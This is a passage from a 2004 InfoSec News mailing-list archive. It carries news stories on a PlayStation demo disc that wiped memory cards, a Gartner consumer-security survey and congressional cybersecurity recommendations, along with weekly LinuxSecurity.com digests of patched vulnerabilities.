the game demos on the disc, their PS2 memory cards were completely erased. While that doesn't mean much to nongamers, anyone who has spent 40-plus hours building a character in a role-playing game or playing through a season of football - well, it's a huge boot in the trousers. The disc, sent via mail to PlayStation Underground members, was also set to be polybagged with several gaming magazines. The glitch was caught in time, so the bug didn't reach as many consumers as it might have. Ryan Bowling, public relations manager for Sony Computer Entertainment America, said Sony responded to the situation by sending out warning e-mails to PlayStation Underground subscribers telling them to remove their memory cards before playing the demo. "It is unfortunate that it happened," Bowling said, "and we're going to make sure it doesn't happen again." But what does this mean for the rest of us? There's more to the story than a handful of gamers losing their saved game files. The implications of such a glitch can be huge, especially as consumers start to set up networked computing systems in the home with routers, networks, servers, etc. Minus cubicles and a water cooler, it's the equivalent of a small enterprise network. Rick Fleming, chief technology officer at Digital Defense Inc, said that although most consumers don't realize it, game consoles are also like computers that run off of their own proprietary operating system. As a result, a bug in a demo CD, CD-ROM or DVD-ROM could affect the rest of a home network and has the potential to spread to an enterprise network through a VPN connection or other portable storage devices. "PlayStation and Xbox are being networked with home computers so I can easily see how something like that would spread across a network," Fleming said. "Every time you connect to something else, there's another opportunity for something to go wrong." Trouble Inside the Firewall The idea that a removable disk can affect an entire networked system seems almost quaint, reserved for corporate spoofs such as "Office Space" where the protagonists use a program on a 3.5 floppy disk to steal money from the company. Now, the companies and consumers focus on outside threats, with the illusion that they're sitting pretty behind Internet firewalls and anti-virus programs. "It's like they'll leave the windows and sliding glass doors open," Fleming said. "Not the front door, though. It's vaulted shut." While there are few recent instances of companies sending out software with embedded viruses, it still happens on occasion. In 2002, Microsoft sent out a .Net developer disk infected with the Nimda virus, though Microsoft says it didn't actually spread to any machines. In the entertainment sector, AOL Time-Warner released a "Powerpuff Girls" DVD in 2001 that contained the peevish "FunLove" virus, which spread to users who played the disc on PC. In an earlier echo of the PlayStation Underground incident, MacAddict Magazine sent out a demo with a version of the Auto-Start virus. In most of these cases, the problems were easily fixed, but is still a signifier that seemingly innocent CDs sent out by reputable companies can contain malicious content. With the CD drives in virtually every machine, it's more common than ever for people to share information via optical media, Fleming said. Most people don't give a second thought to putting something like that in their machine. So, are these little glitches as banal as reports make them out to be? Maybe?though more conspiratorial analysts say these harmless bugs could turn into an entirely new threat that the security community is not ready to handle. "Most of the time when we see threats show up, it's a concept for how a Trojan or virus can be introduced," Fleming said. "When it's introduced, it's mostly very benign?erasing the flash memory on a PlayStation is not going to affect me personally?but what does concern me is that we have a whole new threat vector. People are going to take the concept and think, 'What's the next thing I can do?'" An Ounce of Prevention Not every security expert takes the same point of view, but they all agree that any networked user needs to take the same precautions, whether they're on a home or business network. John Pescatore, vice president of Internet Security at Gartner Inc., said home network security has a long way to go, since most major companies involved in home computing don't focus on that kind of security environment. "There's a funny thing going on," he said. "For many years, Microsoft built Windows with home users in mind, but in 2001-2002, they got religion and started doing more for enterprise security. They forgot about the home user who doesn't have an IT staff to take care of their problems. Pescatore also said there's been discussion in the industry about how to integrate security into consumer electronics. The problem is that companies still say anything harder to use slows down consumer adoption?so no one is willing to make security a priority in a consumer environment. "There's not a lot of incentive to say, 'My product is harder to use,'" Pescatore said. AOL has recently taken one of the first steps into helping consumers with security by offering McAfee VirusScan Online services for free. Businesses also can take a few notes from a home network invasion. Much like home users, Fleming said businesses keep a closer watch on outside threats and don't do enough to make sure that nothing is coming from within the company. "Computer institutions and the FBI have surveys that show around 60 percent of all security instances occur internally," Fleming said. "This is where a lot of companies don't get it. They do all of the testing on outside resources and don't monitor internally." Fleming strongly recommended that businesses create a strong security policy that's enforced through monitoring and training. People need to be aware of bringing in software and other devices from home. That includes things such as music CDs, which often store data other than the actual music tracks. "There has to be mandated vigilance in the enterprises," Fleming said. "It's got to be pounded into their heads to be careful." From isn at c4i.org Mon Dec 6 04:27:04 2004 From: isn at c4i.org (InfoSec News) Date: Mon Dec 6 05:21:39 2004 Subject: [ISN] Linux Advisory Watch - December 3rd 2004 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 3rd, 2004 Volume 5, Number 48a | +---------------------------------------------------------------------+ Editors: Dave Wreski Benjamin D. Thomas dave@linuxsecurity.com ben@linuxsecurity.com Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability. This week advisories were released for java, abiworld, cyrus, squirrelmail, libgd1, openssl, hpsockd, policycoreutils, prelink, libselinux, udev, tcpdump, samba, gaim, FreeBSD kernel, phpMyAdmin, libxpm4, kde, amavisd, open motif, linux kernel, and cyrus-imapd. The distributors include Conectiva, Debian, Fedora, Gentoo, Mandrake, Trustix, Red Hat, and SuSE. ----- Open Letter to Linux Security Community Welcome to the new LinuxSecurity.com! I must admit, I am really proud of what we have been able to accomplish over the years. LinuxSecurity.com has grown from a small idea that a couple of security geeks had in 1999, to a major and well respected Linux resource. With an all new look & feel, organizational changes, security events, and additions to our staff, we hope to better serve the Linux and open source community. Although there are many aesthetic improvements, a major part of our development has focused on creating a content structure and backend system that is easy to update. Since the beginning, we have been able to maintain one of the largest, if not the largest and most comprehensive Linux advisory archive on the Internet. Through the years, we have scoured the net for thousands of hours to bring fresh and relevant articles, papers, and resources to you. It wasn't easy in the beginning. We had to create the site from scratch and build a community-wide reputation. The site was started in 1999, the middle of the dot-com boom. Dave Wreski, a Linux security expert and the original founder of LinuxSecurity.com had great foresight. He envisioned the widespread use of Linux as well as many other open source tools. Rather than companies spending thousands of dollars on proprietary tools, he saw a world where open source would be respected and adopted because of its flexibility and greater security through open standards and full disclosure... Read Full Text: http://www.linuxsecurity.com/content/view/117288/49/ ----- Mass deploying Osiris Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for a client and at a specified time, sends the configuration file over to the client, runs a scan and sends the results back to the server to compare any changes. Those changes are then sent via email, if configured, to a system admin or group of people. The communication is all done over an encrypted communication channel. http://www.linuxsecurity.com/content/view/101883/49/ --------------------------------------------------------------------- AIDE and CHKROOTKIT Network security is continuing to be a big problem for companies and home users. The problem can be resolved with an accurate security analysis. In this article I show how to approach security using aide and chkrootkit. http://www.linuxsecurity.com/content/view/101882/49/ ------ --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------------------+ | Distribution: Conectiva | ----------------------------// +---------------------------------+ * Conectiva: java plugin vulnerability 26th, November, 2004 Jouko Pynnonen reported[2], through iDEFENSE, a vulnerability[3] in the plugin mechanism which allows remote attackers to bypass the Java sandbox through the use of javascript. http://www.linuxsecurity.com/content/view/106930 * Conectiva: abiword buffer overflow vulnerability fix 1st, December, 2004 iDefense[3] discovered[4] a buffer overflow vulnerability[5] in the wv library which could allow an attacker to execute arbitrary code with the privileges of the user running the vulnerable application. http://www.linuxsecurity.com/content/view/117319 * Conectiva: cyrus-imapd Multiple vulnerabilities 1st, December, 2004 Stefan Esser from e-matters security recently published[2] several vulnerabilities in cyrus-imapd. http://www.linuxsecurity.com/content/view/117320 * Conectiva: squirrelmail cross site scripting vulnerability fix 2nd, December, 2004 Joost Pol noticed[2] that SquirrelMail is prone to a cross site scripting issue in the decoding of encoded text in certain headers. SquirrelMail correctly decodes the specially crafted header, but doesn't sanitize the result. http://www.linuxsecurity.com/content/view/117321 +---------------------------------+ | Distribution: Debian | ----------------------------// +---------------------------------+ * Debian: libgd1 arbitrary code execution fix 29th, November, 2004 More potential integer overflows have been found in the GD graphics library which weren't covered by our security advisory DSA 589. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine. http://www.linuxsecurity.com/content/view/106931 * Debian: libgd2 arbitrary code execution fix 29th, November, 2004 More potential integer overflows have been found in the GD graphics library which weren't covered by our security advisory DSA 589. They could be exploited by a specially crafted graphic and could lead to the execution of arbitrary code on the victim's machine. http://www.linuxsecurity.com/content/view/106932 * Debian: openssl insecure temporary file creation fix 1st, December, 2004 Trustix developers discovered insecure temporary file creation in a supplemental script (der_chop) of the openssl package which may allow local users to overwrite files via a symlink attack. http://www.linuxsecurity.com/content/view/117312 * Debian: hpsockd denial of service fix 3rd, December, 2004 "infamous41md" discovered a buffer overflow condition in hpsockd, the socks server written at Hewlett-Packard. An exploit could cause the program to crash or may have worse effect. http://www.linuxsecurity.com/content/view/117313 +---------------------------------+ | Distribution: Fedora | ----------------------------// +---------------------------------+ * Fedora: policycoreutils-1.18.1-2 update Resend with correct id 30th, November, 2004 FixFiles.cron is not needed for targeted policy and needs to be reworked for strict policy. Removing prevents possible relabeling problems. http://www.linuxsecurity.com/content/view/106953 * Fedora: policycoreutils-1.18.1-2 update 30th, November, 2004 FixFiles.cron is not needed for targeted policy and needs to be reworked for strict policy. Removing prevents possible relabeling problems. http://www.linuxsecurity.com/content/view/106952 * Fedora: prelink-0.3.3-0.fc3 update 30th, November, 2004 if layout code needs to re-prelink some library, make sure all libraries that depend on it are re-prelinked too (#140081) http://www.linuxsecurity.com/content/view/106950 * Fedora: libselinux-1.19.1-8 update 30th, November, 2004 Change location of helper applications and remove some debug applications that should not have been part of the distribution. http://www.linuxsecurity.com/content/view/106951 * Fedora: udev-039-10.FC3.2 update 30th, November, 2004 Forgot to turn of debugging logging. This release speeds up udev. http://www.linuxsecurity.com/content/view/106948 * Fedora: tcpdump-3.8.2-6.FC2.1 update 30th, November, 2004 fixed nfs protocol parsing for 64 bit architectures (bug 132781) http://www.linuxsecurity.com/content/view/106949 * Fedora: abiword-2.0.12-7.fc3 update 30th, November, 2004 Fixes for tempnam usages and startup geometry crashes http://www.linuxsecurity.com/content/view/106947 * Fedora: system-config-securitylevel-1.4.18-2 update 29th, November, 2004 This fixes tracebacks introduced by the libselinux update (#139155) http://www.linuxsecurity.com/content/view/106944 * Fedora: samba-3.0.9-1.fc2 update 29th, November, 2004 This update closes two security holes: CAN-2004-0882 and CAN-2004-0930 http://www.linuxsecurity.com/content/view/106941 * Fedora: samba-3.0.9-1.fc3 update 29th, November, 2004 This update closes two security holes: CAN-2004-0882 and CAN-2004-0930. http://www.linuxsecurity.com/content/view/106942 * Fedora: gaim-1.0.2-0.FC2 update 29th, November, 2004 FC2 Update http://www.linuxsecurity.com/content/view/106943 * Fedora: squirrelmail-1.4.3a-6.FC2 update 28th, November, 2004 CAN-2004-1036 Cross Site Scripting in encoded text http://www.linuxsecurity.com/content/view/106934 * Fedora: squirrelmail-1.4.3a-6.FC3 update 28th, November, 2004 CAN-2004-1036 Cross Site Scripting in encoded text http://www.linuxsecurity.com/content/view/106935 * Fedora: spamassassin-3.0.1-0.FC3 update 28th, November, 2004 Several important bug fixes in upstream release. http://www.linuxsecurity.com/content/view/106936 * Fedora: system-config-date-1.7.13-0.fc3.1 update 29th, November, 2004 enable Gujarati and Tamil translations (#140881) http://www.linuxsecurity.com/content/view/106937 +---------------------------------+ | Distribution: FreeBSD | ----------------------------// +---------------------------------+ * FreeBSD: Kernel memory disclosure in procfs and linprocfs 2nd, December, 2004 The implementation of the /proc/curproc/cmdline pseudofile in the procfs(5) file system on FreeBSD 4.x and 5.x, and of the /proc/self/cmdline pseudofile in the linprocfs(5) file system on FreeBSD 5.x reads a process' argument vector from the process address space. During this operation, a pointer was dereferenced directly without the necessary validation steps being performed. http://www.linuxsecurity.com/content/view/117318 +---------------------------------+ | Distribution: Gentoo | ----------------------------// +---------------------------------+ * Gentoo: Sun and Blackdown Java Applet privilege escalation 29th, November, 2004 The Java plug-in security in Sun and Blackdown Java environments can be bypassed to access arbitrary packages, allowing untrusted Java applets to perform unrestricted actions on the host system. http://www.linuxsecurity.com/content/view/106945 * Gentoo: Open DC Hub Remote code execution 28th, November, 2004 Open DC Hub contains a buffer overflow that can be exploited to allow remote code execution. http://www.linuxsecurity.com/content/view/106940 * Gentoo: phpWebSite HTTP response splitting vulnerability 26th, November, 2004 phpWebSite is vulnerable to possible HTTP response splitting attacks. http://www.linuxsecurity.com/content/view/106929 * Gentoo: phpMyAdmin Multiple XSS vulnerabilities 27th, November, 2004 phpMyAdmin is vulnerable to cross-site scripting attacks. http://www.linuxsecurity.com/content/view/106939 +---------------------------------+ | Distribution: Mandrake | ----------------------------// +---------------------------------+ * Mandrake: libxpm4 correct issues with previous update 30th, November, 2004 The previous libxpm4 update had a linking error that resulted in a missing s_popen symbol error running applications dependant on the library. In addition, the file path checking in the security updates prevented some applications, like gimp-2.0 from being able to save xpm format images. http://www.linuxsecurity.com/content/view/106946 * Mandrake: kdepim various bugs fix 27th, November, 2004 A number of bugs in kdepim are fixed with this update. http://www.linuxsecurity.com/content/view/106938 * Mandrake: kdelibs various bugs fix 26th, November, 2004 A number of bugs in kdelibs are fixed with this update. http://www.linuxsecurity.com/content/view/106925 * Mandrake: kdebase various bugs fixes 26th, November, 2004 A number of bugs in kdebase are fixed with this update. http://www.linuxsecurity.com/content/view/106924 +---------------------------------+ | Distribution: Trustix | ----------------------------// +---------------------------------+ * Trustix: amavisd-new, anaconda, courier-imap, cyrus-imapd, cyrus-sasl, file, kernel, mkbootdisk, mys 29th, November, 2004 Fix amavis user creation on install. Support kickstart files on FTP. Hyperthreading detection. http://www.linuxsecurity.com/content/view/106933 +---------------------------------+ | Distribution: Red Hat | ----------------------------// +---------------------------------+ * Red Hat: openmotif image vulnerability fix 2nd, December, 2004 Updated openmotif packages that fix flaws in the Xpm image library are now available. http://www.linuxsecurity.com/content/view/117314 * Red Hat: kernel security vulnerabilities fix 2nd, December, 2004 Updated kernel packages that fix several security issues in Red Hat Enterprise Linux 3 are now available. http://www.linuxsecurity.com/content/view/117315 * SuSE: various kernel problems 1st, December, 2004 Several security problems have been found and addressed by the SUSE Security Team. The following issues are present in all SUSE Linux based products. http://www.linuxsecurity.com/content/view/117316 +---------------------------------+ | Distribution: SuSE | ----------------------------// +---------------------------------+ * SuSE: cyrus-imapd remote command execution 3rd, December, 2004 Stefan Esser reported various bugs within the Cyrus IMAP Server. These include buffer overflows and out-of-bounds memory access which could allow remote attackers to execute arbitrary commands as root. The bugs occur in the pre-authentication phase, therefore an update is strongly recommended. http://www.linuxsecurity.com/content/view/117317 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Tue Dec 7 03:24:41 2004 From: isn at c4i.org (InfoSec News) Date: Tue Dec 7 03:37:02 2004 Subject: [ISN] Linux Security Week - December 6th 2004 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | December 6th, 2004 Volume 5, Number 48n | | | | Editorial Team: Dave Wreski dave@linuxsecurity.com | | Benjamin D. Thomas ben@linuxsecurity.com | +---------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, perhaps the most interesting articles include, Anti-Hacker Tool Kit 2/e, A Secure Network Needs Informed Workers, Network Forensic Tools, and Transcript of the LinuxSecurity.com Launch Chat. --- >> The Perfect Productivity Tools << WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set-up comprehensive addressbooks to consistently keep employees organized and connected. http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=3Dgdn05 --- LINUX ADVISORY WATCH This week advisories were released for java, abiworld, cyrus, squirrelmail, libgd1, openssl, hpsockd, policycoreutils, prelink, libselinux, udev, tcpdump, samba, gaim, FreeBSD kernel, phpMyAdmin, libxpm4, kde, amavisd, open motif, linux kernel, and cyrus-imapd. The distributors include Conectiva, Debian, Fedora, Gentoo, Mandrake, Trustix, Red Hat, and SuSE. http://www.linuxsecurity.com/content/view/117327/150/ ----- Open Letter to the Linux Security Community With an all new look & feel, organizational changes, security events, and additions to our staff, we hope to better serve the Linux and open source community. Although there are many aesthetic improvements, a major part of our development has focused on creating a content structure and backend system that is easy to update. http://www.linuxsecurity.com/content/view/117288/49/ ----- Mass deploying Osiris Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for a client and at a specified time, sends the configuration file over to the client, runs a scan and sends the results back to the server to compare any changes. Those changes are then sent via email, if configured, to a system admin or group of people. The communication is all done over an encrypted communication channel. http://www.linuxsecurity.com/content/view/101884/49/ ----- --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------+ | Host Security News: | <<-----[ Articles This Week ]---------- +---------------------+ * Anti-Hacker Tool Kit 2/e 2nd, December, 2004 In every day life people do all sorts of things with all sorts of tools. But, do they get it right? Every tool has to be used in a certain manner, and if one doesn=E2=80=99t know how to use it, the result c= an be damage. It's the same is with computer and network security tools. Before you can select the right tools for the job, you have to know what tools are available and learn how to use them. http://www.linuxsecurity.com/content/view/117307 * Unprotected PCs can be hijacked in minutes 30th, November, 2004 Simply connecting to the Internet -- and doing nothing else -- exposes your PC to non-stop, automated break-in attempts by intruders looking to take control of your machine surreptitiously. http://www.linuxsecurity.com/content/view/116796 * Network Forensic Tools 3rd, December, 2004 Stage 1: Network-capable initial analysis products for first responders, such as Guidance's EnCase Enterprise Edition and Technology Pathway's ProDiscover. These two products can acquire drive images remotely in a live environment, and their use eliminates the need for the Stage 2 tools. http://www.linuxsecurity.com/content/view/117361 * Hacking tool reportedly draws FBI subpoenas 1st, December, 2004 The author of the popular freeware hacking tool Nmap warned users this week that FBI agents are increasingly seeking access to information from the server logs of his download site, insecure.org. http://www.linuxsecurity.com/content/view/117282 +------------------------+ | Network Security News: | +------------------------+ * AirTight Networks announced first Wi-Fi Firewall 1st, December, 2004 AirTight Networks, formerly Wibhu Technologies, announced on Tuesday the availability of SpectraGuard 2.0, the first Wi-Fi firewall to protect enterprise networks from wireless security threats. http://www.linuxsecurity.com/content/view/117287 * Bad, Bad Bots 1st, December, 2004 Automated attacks are coming from unexpected quarters--from across the globe, across town, and most creepily, even from across the hall. According to a recent report from anti-virus vendor Symantec, this year's 450 percent increase in the number of attacks on Windows machines is evidence that automation is proving as efficient for 21st-Century hackers as it did for 20th-Century manufacturers. http://www.linuxsecurity.com/content/view/117295 * Linux Netwosix 1.2 Jinko is released 28th, November, 2004 I'm ready to announce that Linux Netwosix 1.2 is ready. I have completely rebuilt , upgraded and secured the system. Please, read the Announcement Release. Is based on the powerful and reliable Kernel 2.6.9 and has been created for the requirements of every SysAdmin. Nepote contains the updated packages. You can download Netwosix from our Download Center or from one of our mirrors. Thank you! http://www.linuxsecurity.com/content/view/116794 +------------------------+ | General Security News: | +------------------------+ * User knowledge key to good security 1st, December, 2004 Given the continual drive to secure today's enterprises, and in light of National Computer Security Day celebrated this week, Security Pipeline tapped Kathleen M. Coe, Symantec Corp.'s regional education director of education services, for insight on how to foster better user security behavior, as well as how to seed a strong corporate security culture companies require today. http://www.linuxsecurity.com/content/view/117296 * Panelists: A Secure Network Needs Informed Workers 1st, December, 2004 Analysts, law enforcement agents and corporate IT managers focused on surprisingly nontechnical security solutions Tuesday as they discussed the latest risks to corporate networks as part of Ziff Davis Media's online "virtual" tradeshow on security. http://www.linuxsecurity.com/content/view/117286 * Why you should take information security seriously 1st, December, 2004 All of us rely on information every day in just about every aspect of our life. As information is so important, we tend to rank it by its reliability. There are some people whose opinion we trust implicitly on certain matters. We accept as a matter of course that information is only valuable if it is accurate. The most valuable sources of information are those that are seen to be inherently reliable and easy to access. http://www.linuxsecurity.com/content/view/117297 * Federated ID facilitates Web services 1st, December, 2004 Companies looking to make Web services available to business partners and their respective user bases must first figure out how to federate identity. Federated identity management refers to managing access so that only those who have a right to use specific services may do so. http://www.linuxsecurity.com/content/view/117294 * Community Spam Fighting Effort Faces Heat 2nd, December, 2004 Lycos Europe is offering a "screensaver that spams the spammers," using idle computer time to attack sites that have been blacklisted for abusive spamming practices. Monitoring of three of the targets housed on Chinese servers shows that two of the sites, bokwhdok.com and printmediaprofits.biz, have been knocked offline by the attack. A third target, rxmedherbals.info, has remained largely available, with intermittent outages. http://www.linuxsecurity.com/content/view/117308 * Transcript of Launch Chat 2nd, December, 2004 To celebrate the launch of the new LinuxSecurity.com, we hosted a community chat event. It was held yesterday (December 1st 2004) at 4:00pm, and featured several prominent visionaries from the open source community including Jay Beale, Brian Hatch, Paul Vixie, Lance Spitzner, and Dave Wreski. The topics discussed ranged from authentication, patch management, honeypots, virtues of open source, SELinux, as well as others. We are planning another event to held in January; please send us your ideas. (contribute@linuxsecurity.com) http://www.linuxsecurity.com/content/view/117310 * Follow-up: Lycos pulls anti-spam screensaver from site 3rd, December, 2004 Lycos Europe appeared to have pulled a controversial anti-spam screensaver program from its site on Friday, after coming under fire from both security experts and the spammers themselves. http://www.linuxsecurity.com/content/view/117323 * FBI's Cyber-Crime Chief Relates Struggle for Top Talent 1st, December, 2004 The FBI's inability to recruit and keep the best available IT talent has proven to be one of the biggest challenges facing the government's Internet Crime Complaint Center (I3C), a senior official said Tuesday. http://www.linuxsecurity.com/content/view/117285 * Linux in Government: The Government Open Code Collaborative 3rd, December, 2004 As we celebrate the holiday season and prepare for the next round of legislation, a group of state and local governments has banded together to collect and distribute freely the costly software that normally runs taxpayers $100 billion annually. Called the Government Open Code Collaborative or GOCC.gov, this organization states that its members work together voluntarily to encourage "the sharing, at no cost, of computer code developed for and by government entities where the redistribution of this code is allowed". http://www.linuxsecurity.com/content/view/117322 * Is Cyberterrorism Being Thwarted? 3rd, December, 2004 Recently, there's been increased criticism of the federal government's efforts to secure the Internet. The September departure of Amit Yoran from the Department of Homeland Security was widely cited as indicative of problems that run deep, not just through DHS, but the entire government. While everyone agrees there's much work to do, it's important to recognize the accomplishments of the past few years. http://www.linuxsecurity.com/content/view/117324 * Mobile & Wireless: Security was the Watchword in 2004 1st, December, 2004 It's no surprise that the issue that topped the Wi-Fi agenda in 2004 was the same one that's plagued it almost from its introduction. Security, or rather "lack thereof," was an inherent problem in WEP (Wired Equivalent Privacy), the native security spec in the 802.11 IEEE standard. http://www.linuxsecurity.com/content/view/117283 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Tue Dec 7 03:25:03 2004 From: isn at c4i.org (InfoSec News) Date: Tue Dec 7 03:37:04 2004 Subject: [ISN] Gartner: Consumers dissatisfied with online security Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,98083,00.html By Paul Roberts DECEMBER 06, 2004 IDG NEWS SERVICE A survey conducted by Gartner Inc. shows that online consumers are growing frustrated with the lack of security provided by banks and online retailers and feel that passwords are no longer sufficient to secure their online transactions. The findings are the latest conclusions drawn from a survey of 5,000 adult Internet users. The survey, which concluded in April, showed that online shoppers want retailers to offer more than just passwords to protect their accounts, and indicate that concerns about a lack of security may be hampering the growth of online commerce, according to Gartner analyst Avivah Litan. Almost 60% of the respondents said they're concerned or very concerned about online security. Even more important for online retailers: Over 80% of those surveyed said they would buy more from an online vendor who offered them more than just a username and password to protect their accounts, she said. "The data shows that consumers want more than passwords," said Litan. However, there are limits to how far consumers will go to secure their online activities. When asked to choose among technologies to supplement password protections, respondents gave high ratings to low-tech options such as challenge and response features, which ask shoppers to provide responses to tailored questions, or shared secret technology that displays shopper-selected images on Web pages to prove the authenticity of e-commerce Web sites. More complicated solutions like security software downloads or so-called multifactor authentication that couple smart cards or USB tokens with usernames and passwords were less popular, said Litan. The most popular choice for fixing the security of online shopping and banking sites is for providers to be made legally responsible for strict security measures, she said. Also, those surveyed indicated that they want the choice of using stronger authentication but do not want to be forced to use it. "Our data shows that consumers think the system is easy to use, but they want something that gives them added protection," she said. Banks and online retailers in the U.S. have lagged behind their counterparts in the European Union and Asia when it comes to using strong authentication to secure online transactions, including smart-card technology and one-time passwords, said Litan. Gartner predicts that by the end of 2007, more than 60% of banks in the U.S., but fewer than 20% of banks worldwide, will rely on simple passwords to authenticate retail customers. But that may change, especially as retailers and banks contend with a wave of sophisticated online scams known as phishing attacks in which people are lured to phony Web sites where they're tricked into divulging personal information such as bank and credit card account numbers, Litan said. Recently, U.S. Bancorp. said that it will use a hardware-token-based authentication service from VeriSign Inc. to secure access to commercial banking services for its customers and may soon introduce a similar service for consumer banking customers. "We're getting more calls from banks and other providers that are looking to protect their customers and give them added security," said Litan. "They're worried that consumers are losing confidence in the online channel." Gartner will publish a research note on consumer authentication options in the near future, according to Litan. From isn at c4i.org Tue Dec 7 03:25:23 2004 From: isn at c4i.org (InfoSec News) Date: Tue Dec 7 03:37:06 2004 Subject: [ISN] Committee pushes for cybersecurity post Message-ID: Forwarded from: William Knowles http://www.fcw.com/fcw/articles/2004/1206/web-dhs-12-06-04.asp By Dibya Sarkar Dec. 6, 2004 Members of the House Select Homeland Security Committee have recommended establishing a new assistant secretary position within the Homeland Security Department to better integrate and coordinate cybersecurity issues. The recommendation is one of six suggestions listed in a new 41-page, bipartisan report [1] that was released today by the committee's cybersecurity subcommittee. The report stated that although DHS officials have created the National Cyber Security Division and several other coordination entities, "now is the time to build toward more robust capabilities." It also stated DHS officials need to exert more effort to work with the private sector and across critical infrastructure sectors in addition to state and local governments. Specifically, the report said officials should: * Create an assistant secretary position within DHS' Information Analysis and Infrastructure Protection Directorate to improve integration within the department and coordination of best practices, risk assessments and warnings across government and the private sector. * Develop a comprehensive and detailed program about current and future plans, implementation guidance and staff recruitment, retention and assignment goals. They should also provide budget information that would be linked to the national strategy. * Update the outreach, coordination and information sharing plan with the private sector, considering different needs of groups and innovative mechanisms for information sharing. * Improve performance on cybersecurity risk assessments and remediation activities that would include a plan for Internet-related recovery. They should also improve coordination with "cyber first responders" across the government and private sectors. * Identify specific initiatives in which DHS' cybersecurity division and the National Communications Systems, a two-dozen member federal interagency group that coordinates and plans for national security and emergency communications during crises, can work together because of their similar missions. Officials should advance the convergence of voice and data technology. * Support research and development and educational activities to improve products and services that are user-friendly. [1] http://hsc.house.gov/files/cybersecurityreport12.06.04.pdf *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ---------------------------------------------------------------- C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Wed Dec 8 02:58:08 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 8 03:15:16 2004 Subject: [ISN] Gartner: Consumers dissatisfied with online security Message-ID: Forwarded from: Mark Bernard Dear Associates, As there any surprises here? I think that we're probably all a little concerned about online security. But for those who aren't sure what to think there is always the option of paying Gartner $17k to have them tell you what you should be thinking!! Based on research that I have conducted against the Privacy Commissioners database of completed investigations over 67% of nearly three-hundred investigations here in Canada have been conducted against financial institutions. In contrast 97% of those investigations have required residual remedies to be developed and implemented to resolve confirmed issues. Lesson learned, do your home work up front and avoid productivity issues, federal investigations and wasting time/money. Mark E. S. Bernard, CISM, CISSP, PM, e-mail: Mark.Bernard@TechSecure.ca Web: http://www.TechSecure.ca Phone: (506) 325-0444 Leadership Quotes by Edwin H. Friedman: "Leadership can be thought of as a capacity to define oneself to others in a way that clarifies and expands a vision of the future." Information Security Notice: This e-mail is classified as private and is intended for use by the sender and recipient "only". Unauthorized access to this e-mail will be dealt with in accordance to the Canadian charter of rights and freedoms section 7 and 8. ----- Original Message ----- From: "InfoSec News" To: Sent: Tuesday, December 07, 2004 4:25 AM Subject: [ISN] Gartner: Consumers dissatisfied with online security > http://www.computerworld.com/securitytopics/security/story/0,10801,98083,00.html > > By Paul Roberts > DECEMBER 06, 2004 > IDG NEWS SERVICE > > A survey conducted by Gartner Inc. shows that online consumers are > growing frustrated with the lack of security provided by banks and > online retailers and feel that passwords are no longer sufficient to > secure their online transactions. > > The findings are the latest conclusions drawn from a survey of 5,000 > adult Internet users. The survey, which concluded in April, showed > that online shoppers want retailers to offer more than just > passwords to protect their accounts, and indicate that concerns > about a lack of security may be hampering the growth of online > commerce, according to Gartner analyst Avivah Litan. > > Almost 60% of the respondents said they're concerned or very > concerned about online security. Even more important for online > retailers: Over 80% of those surveyed said they would buy more from > an online vendor who offered them more than just a username and > password to protect their accounts, she said. > > "The data shows that consumers want more than passwords," said > Litan. However, there are limits to how far consumers will go to > secure their online activities. [...] From isn at c4i.org Wed Dec 8 02:58:30 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 8 03:15:18 2004 Subject: [ISN] Tougher Cyber-Security Measures Urged Message-ID: http://www.washingtonpost.com/wp-dyn/articles/A45622-2004Dec7.html By Brian Krebs Special to The Washington Post December 8, 2004 A group representing technology industry executives yesterday called on the Bush administration to step up efforts to protect the nation's computer and Internet infrastructure, and it proposed that the top official in charge be given a higher profile. The Cyber Security Industry Alliance urged the federal government to elevate the position of national cyber-security director to the assistant secretary level. The director now reports to an assistant secretary who is responsible for both cyber and physical security threats. "There is not enough attention on cyber-security within the administration," said Paul B. Kurtz, the alliance's director and a former senior cyber-security official in the Bush administration. "The executive branch must exert more leadership." The alliance, an industry advocacy group that includes representatives from companies that sell cyber-security software, hardware and services, urged Bush to use his second term to focus more attention on cyber-security. Kurtz was joined at yesterday's event by Amit Yoran, the former director of Homeland Security's National Cyber Security Division who resigned in September. "We really have an opportunity here to address cyber-security in a more aggressive fashion," said Yoran, who was the third high-level cyber-security official to leave Homeland Security in 18 months. "There is broad unanimity across the cyber-security community that we are still vulnerable and we need to do more." The latest congressional effort to raise the profile of cyber-security within the Homeland Security Department failed this week. House leaders included language raising the cyber-security director's status in a bill designed to overhaul the nation's intelligence community, but the measure was stripped from the version of the legislation agreed to by House and Senate negotiators. The technology industry alliance's recommendations closely mirror those set out in a 41-page report issued Monday by the House subcommittee on cyber-security, part of the Committee on Homeland Security. That report also calls for an 